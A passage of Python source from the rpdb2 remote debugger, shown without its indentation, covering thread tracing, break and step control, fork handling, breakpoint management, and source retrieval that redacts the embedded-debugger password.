last_event = self.m_event
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
if frame == self.m_core.m_return_frame:
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
if last_event == 'exception':
self.m_event = last_event
return None
if event == 'exception':
self.m_event = event
if self.m_code_context.m_fExceptionTrap and self.m_core.m_ftrap:
self.set_exc_info(arg)
self.m_fUnhandledException = True
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
return frame.f_trace
self.m_ue_lineno = frame.f_lineno
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
if is_py3k():
self.set_exc_info(arg)
elif not frame.f_exc_traceback is arg[2]:
(frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
return frame.f_trace
return frame.f_trace
def trace_dispatch_signal(self, frame, event, arg):
#print_debug('*** trace_dispatch_signal %s, %s, %s' % (frame.f_lineno, event, repr(arg)))
self.set_exc_info(arg)
self.set_tracers()
self.set_depth(frame)
sys.setprofile(self.profile)
return self.trace_dispatch_trap(frame, event, arg)
def set_exc_info(self, arg):
"""
Set exception information.
"""
if arg == None:
return
if is_py3k():
self.m_exc_info = arg
return
(t, v, tb) = arg
while tb is not None:
f = tb.tb_frame
f.f_exc_type = t
f.f_exc_value = v
f.f_exc_traceback = tb
tb = tb.tb_next
def get_exc_info(self):
return self.m_exc_info
def reset_exc_info(self):
self.m_exc_info = None
def is_breakpoint(self):
"""
Calc if current line is hit by breakpoint.
"""
bp = self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(self.m_frame, bp):
return True
return False
def get_breakpoint(self):
"""
Return current line breakpoint if any.
"""
return self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
class CDebuggerCore:
"""
Base class for the debugger.
Handles basic debugger functionality.
"""
def __init__(self, fembedded = False):
self.m_ftrace = True
self.m_current_ctx = None
self.m_f_first_to_break = True
self.m_f_break_on_init = False
self.m_builtins_hack = None
self.m_timer_embedded_giveup = None
self.m_threads_lock = threading.Condition()
self.m_threads = {}
self.m_event_dispatcher = CEventDispatcher()
self.m_state_manager = CStateManager(STATE_RUNNING, self.m_event_dispatcher)
self.m_ffork_into_child = False
self.m_ffork_auto = False
self.m_fsynchronicity = True
self.m_ftrap = True
self.m_fUnhandledException = False
self.m_fBreak = False
self.m_lastest_event = None
self.m_step_tid = None
self.m_next_frame = None
self.m_return_frame = None
self.m_saved_step = (None, None, None)
self.m_saved_next = None
self.m_bp_manager = CBreakPointsManager()
self.m_code_contexts = {None: None}
self.m_fembedded = fembedded
self.m_embedded_event = threading.Event()
self.m_embedded_sync_t0 = 0
self.m_embedded_sync_t1 = 0
self.m_heartbeats = {0: time.time() + 3600}
def shutdown(self):
self.m_event_dispatcher.shutdown()
self.m_state_manager.shutdown()
def is_embedded(self):
return self.m_fembedded
def send_fork_switch(self, sync_n):
"""
Notify client that debuggee is forking and that it should
try to reconnect to the child.
"""
print_debug('Sending fork switch event')
event = CEventForkSwitch(sync_n)
self.m_event_dispatcher.fire_event(event)
def send_exec_switch(self, sync_n):
"""
Notify client that debuggee is doing an exec and that it should
try to reconnect (in case the exec failed).
"""
print_debug('Sending exec switch event')
event = CEventExecSwitch(sync_n)
self.m_event_dispatcher.fire_event(event)
def send_event_exit(self):
"""
Notify client that the debuggee is shutting down.
"""
event = CEventExit()
self.m_event_dispatcher.fire_event(event)
def send_events(self, event):
pass
def set_request_go_timer(self, timeout):
"""
Set timeout thread to release debugger from waiting for a client
to attach.
"""
self.cancel_request_go_timer()
if timeout is None:
return
_timeout = max(1.0, timeout)
f = lambda: (
self.record_client_heartbeat(0, False, True),
self.request_go()
)
self.m_timer_embedded_giveup = threading.Timer(_timeout, f)
self.m_timer_embedded_giveup.start()
#
# sleep() releases control and allow timer thread to actually start
# before this scope returns.
#
time.sleep(0.1)
def cancel_request_go_timer(self):
t = self.m_timer_embedded_giveup
if t is not None:
self.m_timer_embedded_giveup = None
t.cancel()
def setbreak(self, f):
"""
Set thread to break on next statement.
"""
if not self.m_ftrace:
return
tid = thread.get_ident()
if not tid in self.m_threads:
return self.settrace(f)
ctx = self.m_threads[tid]
f.f_trace = ctx.trace_dispatch_break
self.m_saved_next = self.m_next_frame
self.m_next_frame = f
def settrace(self, f = None, f_break_on_init = True, timeout = None, builtins_hack = None):
"""
Start tracing mechanism for thread.
"""
if not self.m_ftrace:
return
tid = thread.get_ident()
if tid in self.m_threads:
return
self.set_request_go_timer(timeout)
self.m_f_break_on_init = f_break_on_init
self.m_builtins_hack = builtins_hack
threading.settrace(self.trace_dispatch_init)
sys.settrace(self.trace_dispatch_init)
if f is not None:
f.f_trace = self.trace_dispatch_init
def stoptrace(self):
"""
Stop tracing mechanism.
"""
global g_fignore_atexit
g_fignore_atexit = True
threading.settrace(None)
sys.settrace(None)
sys.setprofile(None)
self.m_ftrace = False
self.set_all_tracers()
try:
self.request_go()
except DebuggerNotBroken:
pass
#self.m_threads = {}
def get_code_context(self, frame):
try:
return self.m_code_contexts[frame.f_code]
except KeyError:
if self.m_builtins_hack != None:
if calc_frame_path(frame) == self.m_builtins_hack:
self.m_builtins_hack = None
frame.f_globals['__builtins__'] = g_builtins_module
code_context = CCodeContext(frame, self.m_bp_manager)
return self.m_code_contexts.setdefault(frame.f_code, code_context)
def get_current_ctx(self):
if len(self.m_threads) == 0:
raise NoThreads
return self.m_current_ctx
def get_ctx(self, tid):
ctx = self.m_threads.get(tid, None)
if ctx == None:
raise ThreadNotFound
return ctx
def wait_for_first_thread(self):
"""
Wait until at least one debuggee thread is alive.
Python can have 0 threads in some circumstances as
embedded Python and the Python interpreter console.
"""
if self.m_current_ctx is not None:
return
try:
self.m_threads_lock.acquire()
while self.m_current_ctx is None:
safe_wait(self.m_threads_lock, 1.0)
finally:
self.m_threads_lock.release()
def notify_first_thread(self):
"""
Notify that first thread is available for tracing.
"""
try:
self.m_threads_lock.acquire()
self.m_threads_lock.notify()
finally:
self.m_threads_lock.release()
def set_exception_trap_frame(self, frame):
"""
Set trap for unhandled exceptions in relevant frame.
"""
while frame is not None:
code_context = self.get_code_context(frame)
if code_context.is_exception_trap_frame():
code_context.m_fExceptionTrap = True
return
frame = frame.f_back
def __set_signal_handler(self):
"""
Set rpdb2 to wrap all signal handlers.
"""
for key, value in list(vars(signal).items()):
# All the signal handlers start with SIG
# but don't have an _ in their name
# 'SIGRTMIN' & 'SIGRTMAX' are not signals
if not key.startswith('SIG') or key.startswith("SIG_") or key in ['SIGRTMIN', 'SIGRTMAX'] :
continue
handler = signal.getsignal(value)
if handler in [signal.SIG_IGN, signal.SIG_DFL]:
continue
try:
signal.signal(value, handler)
except:
print_debug('Failed to set signal handler for signal %s(%d)' % (key, value))
def clear_source_cache(self):
g_lines_cache.clear()
event = CEventClearSourceCache()
self.m_event_dispatcher.fire_event(event)
def trace_dispatch_init(self, frame, event, arg):
"""
Initial tracing method.
"""
if event not in ['call', 'line', 'return']:
return None
code_context = self.get_code_context(frame)
if event == 'call' and code_context.is_untraced():
return None
self.set_exception_trap_frame(frame)
try:
t = current_thread()
name = thread_get_name(t)
except:
name = ''
if name == 'MainThread':
self.__set_signal_handler()
ctx = CDebuggerCoreThread(name, self, frame, event)
ctx.set_tracers()
try:
self.m_threads_lock.acquire()
self.m_threads[ctx.m_thread_id] = ctx
nthreads = len(self.m_threads)
if nthreads == 1:
self.prepare_embedded_sync()
finally:
self.m_threads_lock.release()
if nthreads == 1:
self.clear_source_cache()
self.m_current_ctx = ctx
self.notify_first_thread()
if self.m_f_break_on_init:
self.m_f_break_on_init = False
self.request_break()
sys.settrace(ctx.trace_dispatch_call)
sys.setprofile(ctx.profile)
self.wait_embedded_sync(nthreads == 1)
if event == 'call':
return ctx.trace_dispatch_call(frame, event, arg)
elif hasattr(frame, 'f_trace') and (frame.f_trace is not None):
return frame.f_trace(frame, event, arg)
else:
return None
def prepare_embedded_sync(self):
if not self.m_fembedded:
return
t = time.time()
t0 = self.m_embedded_sync_t0
if t0 != 0:
self.fix_heartbeats(t - t0)
if self.get_clients_attached() == 0:
return
if t - t0 < EMBEDDED_SYNC_THRESHOLD:
return
self.m_embedded_sync_t1 = t
self.m_embedded_event.clear()
def wait_embedded_sync(self, ftrigger):
if not self.m_fembedded:
return
t = time.time()
t0 = self.m_embedded_sync_t0
t1 = self.m_embedded_sync_t1
if t - t0 < EMBEDDED_SYNC_THRESHOLD:
return
if t - t1 >= EMBEDDED_SYNC_TIMEOUT:
return
if ftrigger:
event = CEventEmbeddedSync()
self.m_event_dispatcher.fire_event(event)
safe_wait(self.m_embedded_event, EMBEDDED_SYNC_TIMEOUT - (t - t1))
if ftrigger:
self.m_embedded_sync_t1 = 0
def embedded_sync(self):
self.m_embedded_event.set()
def set_all_tracers(self):
"""
Set trace methods for all frames of all threads.
"""
for ctx in list(self.m_threads.values()):
ctx.set_tracers()
def remove_thread(self, thread_id):
try:
del self.m_threads[thread_id]
if self.m_current_ctx.m_thread_id == thread_id:
self.m_current_ctx = list(self.m_threads.values())[0]
except (KeyError, IndexError):
self.m_embedded_sync_t0 = time.time()
def set_break_flag(self):
self.m_fBreak = (self.m_state_manager.get_state() == STATE_BROKEN)
def is_break(self, ctx, frame, event = None):
if self.m_fBreak:
return True
if ctx.m_fUnhandledException:
return True
if self.m_step_tid == ctx.m_thread_id:
return True
if self.m_next_frame == frame:
return True
if (self.m_return_frame == frame) and (event == 'return'):
return True
return False
def record_client_heartbeat(self, id, finit, fdetach):
"""
Record that client id is still attached.
"""
if finit:
self.m_heartbeats.pop(0, None)
if fdetach:
self.m_heartbeats.pop(id, None)
return
if finit or id in self.m_heartbeats:
self.m_heartbeats[id] = time.time()
def fix_heartbeats(self, missing_pulse):
for k, v in list(self.m_heartbeats.items()):
self.m_heartbeats[k] = v + missing_pulse
def get_clients_attached(self):
n = 0
t = time.time()
for v in list(self.m_heartbeats.values()):
if t < v + HEARTBEAT_TIMEOUT:
n += 1
return n
def is_waiting_for_attach(self):
if self.get_clients_attached() != 1:
return False
if list(self.m_heartbeats.keys()) != [0]:
return False
return True
def _break(self, ctx, frame, event, arg):
"""
Main break logic.
"""
global g_fos_exit
global g_module_main
if not self.is_break(ctx, frame, event) and not ctx.is_breakpoint():
ctx.set_tracers()
return
ctx.m_fBroken = True
f_full_notification = False
f_uhe_notification = False
step_tid = self.m_step_tid
try:
self.m_state_manager.acquire()
if self.m_state_manager.get_state() != STATE_BROKEN:
self.set_break_dont_lock()
if g_module_main == -1:
try:
g_module_main = sys.modules['__main__']
except:
g_module_main = None
if not is_py3k() and not frame.f_exc_traceback is None:
ctx.set_exc_info((frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback))
if is_py3k() and ctx.get_exc_info() == None and sys.exc_info()[2] != None:
ctx.set_exc_info(sys.exc_info())
try:
t = current_thread()
ctx.m_thread_name = thread_get_name(t)
except:
pass
if ctx.m_fUnhandledException and not self.m_fUnhandledException:
self.m_fUnhandledException = True
f_uhe_notification = True
if self.is_auto_fork_first_stage(ctx.m_thread_id):
self.m_saved_step = (self.m_step_tid, self.m_saved_next, self.m_return_frame)
self.m_saved_next = None
self.m_bp_manager.m_fhard_tbp = True
if self.m_f_first_to_break or (self.m_current_ctx == ctx):
self.m_current_ctx = ctx
self.m_lastest_event = event
self.m_step_tid = None
self.m_next_frame = None
self.m_return_frame = None
self.m_saved_next = None
self.m_bp_manager.del_temp_breakpoint(breakpoint = ctx.get_breakpoint())
self.m_f_first_to_break = False
f_full_notification = True
finally:
self.m_state_manager.release()
ffork_second_stage = self.handle_fork(ctx)
self.handle_exec(ctx)
if self.is_auto_fork_first_stage(ctx.m_thread_id):
self.request_go_quiet()
elif self.m_ffork_auto and ffork_second_stage:
(self.m_step_tid, self.m_next_frame, self.m_return_frame) = self.m_saved_step
self.m_saved_step = (None, None, None)
self.m_bp_manager.m_fhard_tbp = False
self.request_go_quiet()
elif self.get_clients_attached() == 0:
#print_debug('state: %s' % self.m_state_manager.get_state())
self.request_go_quiet()
elif step_tid == ctx.m_thread_id and frame.f_code.co_name == 'rpdb2_import_wrapper':
self.request_step_quiet()
else:
if f_full_notification:
self.send_events(None)
else:
self.notify_thread_broken(ctx.m_thread_id, ctx.m_thread_name)
self.notify_namespace()
if f_uhe_notification:
self.send_unhandled_exception_event()
state = self.m_state_manager.wait_for_state([STATE_RUNNING])
self.prepare_fork_step(ctx.m_thread_id)
self.prepare_exec_step(ctx.m_thread_id)
ctx.m_fUnhandledException = False
ctx.m_fBroken = False
ctx.set_tracers()
ctx.reset_exc_info()
if g_fos_exit:
g_fos_exit = False
self.send_event_exit()
time.sleep(1.0)
self.stoptrace()
def is_auto_fork_first_stage(self, tid):
if not self.m_ffork_auto:
return False
return tid == g_forktid and g_forkpid == None
def prepare_fork_step(self, tid):
global g_forkpid
global g_ignore_broken_pipe
if tid != g_forktid:
return
self.m_step_tid = tid
g_forkpid = os.getpid()
if not self.m_ffork_into_child:
return
n = self.get_clients_attached()
self.send_fork_switch(n)
time.sleep(0.5)
g_server.shutdown()
CThread.joinAll()
g_ignore_broken_pipe = time.time()
def handle_fork(self, ctx):
global g_forktid
global g_forkpid
tid = ctx.m_thread_id
if g_forkpid == None or tid != g_forktid:
return False
forkpid = g_forkpid
g_forkpid = None
g_forktid = None
if os.getpid() == forkpid:
#
# Parent side of fork().
#
if not self.m_ffork_into_child:
#CThread.clearJoin()
#g_server.jumpstart()
return True
self.stoptrace()
return False
#
# Child side of fork().
#
if not self.m_ffork_into_child:
self.stoptrace()
return False
self.m_threads = {tid: ctx}
CThread.clearJoin()
g_server.jumpstart()
return True
def prepare_exec_step(self, tid):
global g_execpid
if tid != g_exectid:
return
self.m_step_tid = tid
g_execpid = os.getpid()
n = self.get_clients_attached()
self.send_exec_switch(n)
time.sleep(0.5)
g_server.shutdown()
CThread.joinAll()
def handle_exec(self, ctx):
global g_exectid
global g_execpid
tid = ctx.m_thread_id
if g_execpid == None or tid != g_exectid:
return False
g_execpid = None
g_exectid = None
#
# If we are here it means that the exec failed.
# Jumpstart the debugger to allow debugging to continue.
#
CThread.clearJoin()
g_server.jumpstart()
return True
def notify_thread_broken(self, tid, name):
"""
Notify that thread (tid) has broken.
This notification is sent for each thread that breaks after
the first one.
"""
_event = CEventThreadBroken(tid, name)
self.m_event_dispatcher.fire_event(_event)
def notify_namespace(self):
"""
Notify that a namespace update query should be done.
"""
_event = CEventNamespace()
self.m_event_dispatcher.fire_event(_event)
def get_state(self):
return self.m_state_manager.get_state()
def verify_broken(self):
if self.m_state_manager.get_state() != STATE_BROKEN:
raise DebuggerNotBroken
def get_current_filename(self, frame_index, fException):
"""
Return path of sources corresponding to the frame at depth
'frame_index' down the stack of the current thread.
"""
ctx = self.get_current_ctx()
try:
f = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
frame_filename = calc_frame_path(f)
return frame_filename
finally:
f = None
base_frame = None
ctx.frame_release()
def get_threads(self):
return self.m_threads
def set_break_dont_lock(self):
self.m_f_first_to_break = True
self.m_state_manager.set_state(STATE_BROKEN, fLock = False)
self.set_break_flag()
self.set_all_tracers()
def request_break(self):
"""
Ask debugger to break (pause debuggee).
"""
if len(self.m_threads) == 0:
self.wait_for_first_thread()
try:
self.m_state_manager.acquire()
if self.m_state_manager.get_state() == STATE_BROKEN:
return
self.set_break_dont_lock()
finally:
self.m_state_manager.release()
self.send_events(None)
def request_go_quiet(self, fLock = True):
try:
self.request_go(fLock)
except DebuggerNotBroken:
pass
def request_go(self, fLock = True):
"""
Let debugger run.
"""
try:
if fLock:
self.m_state_manager.acquire()
self.verify_broken()
self.m_fUnhandledException = False
self.m_state_manager.set_state(STATE_RUNNING, fLock = False)
if self.m_fembedded:
time.sleep(0.33)
self.set_break_flag()
finally:
if fLock:
self.m_state_manager.release()
def request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
"""
Let debugger run until temp breakpoint as defined in the arguments.
"""
assert(is_unicode(filename))
assert(is_unicode(scope))
try:
self.m_state_manager.acquire()
self.verify_broken()
if filename in [None, '']:
_filename = self.get_current_filename(frame_index, fException)
elif not is_provider_filesystem(filename):
_filename = as_string(filename, sys.getfilesystemencoding())
else:
_filename = FindFile(filename, fModules = True)
self.m_bp_manager.set_temp_breakpoint(_filename, scope, lineno)
self.set_all_tracers()
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_step_quiet(self, fLock = True):
try:
self.request_step(fLock)
except DebuggerNotBroken:
pass
def request_step(self, fLock = True):
"""
Let debugger run until next statement is reached or a breakpoint
is hit in another thread.
"""
try:
if fLock:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
self.m_step_tid = ctx.m_thread_id
self.m_next_frame = None
self.m_return_frame = None
self.request_go(fLock = False)
finally:
if fLock:
self.m_state_manager.release()
def request_next(self):
"""
Let debugger run until next statement in the same frame
is reached or a breakpoint is hit in another thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
if self.m_lastest_event in ['return', 'exception']:
return self.request_step(fLock = False)
self.m_next_frame = ctx.m_frame
self.m_return_frame = None
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_return(self):
"""
Let debugger run until end of frame frame is reached
or a breakpoint is hit in another thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
if self.m_lastest_event == 'return':
return self.request_step(fLock = False)
self.m_next_frame = None
self.m_return_frame = ctx.m_frame
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_jump(self, lineno):
"""
Jump to line number 'lineno'.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
frame = ctx.m_frame
code = frame.f_code
valid_lines = CalcValidLines(code)
sbi = CScopeBreakInfo(as_unicode(''), valid_lines)
l = sbi.CalcScopeLine(lineno)
frame.f_lineno = l
finally:
frame = None
self.m_state_manager.release()
self.send_events(None)
def set_thread(self, tid):
"""
Switch focus to specified thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
if (tid >= 0) and (tid < 100):
_tid = list(self.m_threads.keys())[tid]
else:
_tid = tid
ctx = self.m_threads[_tid]
except (IndexError, KeyError):
raise ThreadNotFound
self.m_current_ctx = ctx
self.m_lastest_event = ctx.m_event
finally:
self.m_state_manager.release()
self.send_events(None)
class CDebuggerEngine(CDebuggerCore):
"""
Main class for the debugger.
Adds functionality on top of CDebuggerCore.
"""
def __init__(self, fembedded = False):
CDebuggerCore.__init__(self, fembedded)
event_type_dict = {
CEventState: {},
CEventStackDepth: {},
CEventBreakpoint: {},
CEventThreads: {},
CEventNoThreads: {},
CEventThreadBroken: {},
CEventNamespace: {},
CEventUnhandledException: {},
CEventStack: {},
CEventNull: {},
CEventExit: {},
CEventForkSwitch: {},
CEventExecSwitch: {},
CEventSynchronicity: {},
CEventTrap: {},
CEventForkMode: {},
CEventPsycoWarning: {},
CEventConflictingModules: {},
CEventSignalIntercepted: {},
CEventSignalException: {},
CEventClearSourceCache: {},
CEventEmbeddedSync: {}
}
self.m_event_queue = CEventQueue(self.m_event_dispatcher)
self.m_event_queue.register_event_types(event_type_dict)
event_type_dict = {CEventSync: {}}
self.m_event_dispatcher.register_callback(self.send_events, event_type_dict, fSingleUse = False)
def shutdown(self):
self.m_event_queue.shutdown()
CDebuggerCore.shutdown(self)
def sync_with_events(self, fException, fSendUnhandled):
"""
Send debugger state to client.
"""
if len(self.m_threads) == 0:
self.wait_for_first_thread()
index = self.m_event_queue.get_event_index()
event = CEventSync(fException, fSendUnhandled)
self.m_event_dispatcher.fire_event(event)
return index
def trap_conflicting_modules(self):
modules_list = []
for m in CONFLICTING_MODULES:
if m in g_found_conflicting_modules:
continue
if not m in sys.modules:
continue
if m == 'psyco':
#
# Old event kept for compatibility.
#
event = CEventPsycoWarning()
self.m_event_dispatcher.fire_event(event)
g_found_conflicting_modules.append(m)
modules_list.append(as_unicode(m))
if modules_list == []:
return False
event = CEventConflictingModules(modules_list)
self.m_event_dispatcher.fire_event(event)
return True
def wait_for_event(self, timeout, event_index):
"""
Wait for new events and return them as list of events.
"""
self.cancel_request_go_timer()
self.trap_conflicting_modules()
(new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
if self.trap_conflicting_modules():
(new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
return (new_event_index, sel)
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
print_debug('Setting breakpoint to: %s, %s, %d' % (repr(filename), scope, lineno))
assert(is_unicode(filename))
assert(is_unicode(scope))
assert(is_unicode(expr))
fLock = False
try:
if filename in [None, '']:
self.m_state_manager.acquire()
fLock = True
self.verify_broken()
_filename = self.get_current_filename(frame_index, fException)
elif not is_provider_filesystem(filename):
_filename = as_string(filename, sys.getfilesystemencoding())
else:
_filename = FindFile(filename, fModules = True)
if expr != '':
try:
encoding = self.__calc_encoding(encoding, filename = _filename)
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
compile(_expr, '<string>', 'eval')
except:
raise SyntaxError
encoding = as_unicode(encoding)
bp = self.m_bp_manager.set_breakpoint(_filename, scope, lineno, fEnabled, expr, encoding)
self.set_all_tracers()
event = CEventBreakpoint(bp)
#print_debug(repr(vars(bp)))
self.m_event_dispatcher.fire_event(event)
finally:
if fLock:
self.m_state_manager.release()
def disable_breakpoint(self, id_list, fAll):
self.m_bp_manager.disable_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.DISABLE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def enable_breakpoint(self, id_list, fAll):
self.m_bp_manager.enable_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.ENABLE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def delete_breakpoint(self, id_list, fAll):
self.m_bp_manager.delete_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.REMOVE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def get_breakpoints(self):
"""
return id->breakpoint dictionary.
"""
bpl = self.m_bp_manager.get_breakpoints()
_items = [(id, breakpoint_copy(bp)) for (id, bp) in bpl.items()]
for (id, bp) in _items:
bp.m_code = None
_bpl = dict(_items)
return _bpl
def send_events(self, event):
"""
Send series of events that define the debugger state.
"""
if isinstance(event, CEventSync):
fException = event.m_fException
fSendUnhandled = event.m_fSendUnhandled
else:
fException = False
fSendUnhandled = False
try:
if isinstance(event, CEventSync) and not fException:
self.m_state_manager.set_state()
self.send_stack_depth()
self.send_threads_event(fException)
self.send_stack_event(fException)
self.send_namespace_event()
if fSendUnhandled and self.m_fUnhandledException:
self.send_unhandled_exception_event()
except NoThreads:
self.send_no_threads_event()
except:
print_debug_exception()
raise
def send_unhandled_exception_event(self):
event = CEventUnhandledException()
self.m_event_dispatcher.fire_event(event)
def send_stack_depth(self):
"""
Send event with stack depth and exception stack depth.
"""
f = None
tb = None
ctx = self.get_current_ctx()
try:
try:
f = ctx.frame_acquire()
except ThreadDone:
return
s = my_extract_stack(f)
s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
stack_depth = len(s)
tb = get_traceback(f, ctx)
if tb == None:
stack_depth_exception = None
else:
s = my_extract_stack(tb.tb_frame.f_back)
s += my_extract_tb(tb)
s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
stack_depth_exception = len(s)
event = CEventStackDepth(stack_depth, stack_depth_exception)
self.m_event_dispatcher.fire_event(event)
finally:
f = None
tb = None
ctx.frame_release()
def send_threads_event(self, fException):
"""
Send event with current thread list.
In case of exception, send only the current thread.
"""
tl = self.get_thread_list()
if fException:
ctid = tl[0]
itl = tl[1]
_itl = [a for a in itl if a[DICT_KEY_TID] == ctid]
_tl = (ctid, _itl)
else:
_tl = tl
event = CEventThreads(*_tl)
self.m_event_dispatcher.fire_event(event)
def send_stack_event(self, fException):
sl = self.get_stack([], False, fException)
if len(sl) == 0:
return
event = CEventStack(sl[0])
self.m_event_dispatcher.fire_event(event)
def send_namespace_event(self):
"""
Send event notifying namespace should be queried again.
"""
event = CEventNamespace()
self.m_event_dispatcher.fire_event(event)
def send_no_threads_event(self):
_event = CEventNoThreads()
self.m_event_dispatcher.fire_event(_event)
def send_event_null(self):
"""
Make the event waiter return.
"""
event = CEventNull()
self.m_event_dispatcher.fire_event(event)
def __get_stack(self, ctx, ctid, fException):
tid = ctx.m_thread_id
f = None
_f = None
tb = None
_tb = None
try:
try:
f = ctx.frame_acquire()
except ThreadDone:
return None
if fException:
tb = get_traceback(f, ctx)
if tb == None:
raise NoExceptionFound
_tb = tb
while _tb.tb_next is not None:
_tb = _tb.tb_next
_f = _tb.tb_frame
s = my_extract_stack(tb.tb_frame.f_back)
s += my_extract_tb(tb)
else:
_f = f
s = my_extract_stack(f)
code_list = []
while _f is not None:
rc = repr(_f.f_code).split(',')[0].split()[-1]
rc = as_unicode(rc)
code_list.insert(0, rc)
_f = _f.f_back
finally:
f = None
_f = None
tb = None
_tb = None
ctx.frame_release()
#print code_list
__s = [(a, b, c, d) for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
if (ctx.m_uef_lineno is not None) and (len(__s) > 0):
(a, b, c, d) = __s[0]
__s = [(a, ctx.m_uef_lineno, c, d)] + __s[1:]
r = {}
r[DICT_KEY_STACK] = __s
r[DICT_KEY_CODE_LIST] = code_list
r[DICT_KEY_TID] = tid
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_EVENT] = as_unicode([ctx.m_event, 'exception'][fException])
if tid == ctid:
r[DICT_KEY_CURRENT_TID] = True
return r
def get_stack(self, tid_list, fAll, fException):
if fException and (fAll or (len(tid_list) != 0)):
raise BadArgument
ctx = self.get_current_ctx()
ctid = ctx.m_thread_id
if fAll:
ctx_list = list(self.get_threads().values())
elif fException or (len(tid_list) == 0):
ctx_list = [ctx]
else:
ctx_list = [self.get_threads().get(t, None) for t in tid_list]
_sl = [self.__get_stack(ctx, ctid, fException) for ctx in ctx_list if ctx is not None]
sl = [s for s in _sl if s is not None]
return sl
def get_source_file(self, filename, lineno, nlines, frame_index, fException):
assert(is_unicode(filename))
if lineno < 1:
lineno = 1
nlines = -1
_lineno = lineno
r = {}
frame_filename = None
try:
ctx = self.get_current_ctx()
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
frame_filename = calc_frame_path(f)
finally:
f = None
base_frame = None
ctx.frame_release()
frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]
except NoThreads:
if filename in [None, '']:
raise
if filename in [None, '']:
__filename = frame_filename
r[DICT_KEY_TID] = ctx.m_thread_id
elif not is_provider_filesystem(filename):
__filename = as_string(filename, sys.getfilesystemencoding())
else:
__filename = FindFile(filename, fModules = True)
if not IsPythonSourceFile(__filename):
raise NotPythonSource
_filename = winlower(__filename)
lines = []
breakpoints = {}
fhide_pwd_mode = False
while nlines != 0:
try:
g_traceback_lock.acquire()
line = get_source_line(_filename, _lineno)
finally:
g_traceback_lock.release()
if line == '':
break
#
# Remove any trace of session password from data structures that
# go over the network.
#
if fhide_pwd_mode:
if not ')' in line:
line = as_unicode('...\n')
else:
line = '...""")' + line.split(')', 1)[1]
fhide_pwd_mode = False
elif 'start_embedded_debugger(' in line:
ls = line.split('start_embedded_debugger(', 1)
line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'
if ')' in ls[1]:
line += '""")' + ls[1].split(')', 1)[1]
else:
line += '\n'
fhide_pwd_mode = True
lines.append(line)
try:
bp = self.m_bp_manager.get_breakpoint(_filename, _lineno)
breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
except KeyError:
pass
_lineno += 1
nlines -= 1
if frame_filename == _filename:
r[DICT_KEY_FRAME_LINENO] = frame_lineno
r[DICT_KEY_EVENT] = as_unicode(frame_event)
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_LINES] = lines
r[DICT_KEY_FILENAME] = as_unicode(_filename, sys.getfilesystemencoding())
r[DICT_KEY_BREAKPOINTS] = breakpoints
r[DICT_KEY_FIRST_LINENO] = lineno
return r
def __get_source(self, ctx, nlines, frame_index, fException):
tid = ctx.m_thread_id
_frame_index = [0, frame_index][tid == self.m_current_ctx.m_thread_id]
try:
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, _frame_index, fException)
frame_filename = calc_frame_path(f)
except (ThreadDone, InvalidFrame):
return None
finally:
f = None
base_frame = None
ctx.frame_release()
frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]
first_line = max(1, frame_lineno - nlines // 2)
_lineno = first_line
lines = []
breakpoints = {}
fhide_pwd_mode = False
while nlines != 0:
try:
g_traceback_lock.acquire()
line = get_source_line(frame_filename, _lineno)
finally:
g_traceback_lock.release()
if line == '':
break
#
# Remove any trace of session password from data structures that
# go over the network.
#
if fhide_pwd_mode:
if not ')' in line:
line = as_unicode('...\n')
else:
line = '...""")' + line.split(')', 1)[1]
fhide_pwd_mode = False
elif 'start_embedded_debugger(' in line:
ls = line.split('start_embedded_debugger(', 1)
line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'
if ')' in ls[1]:
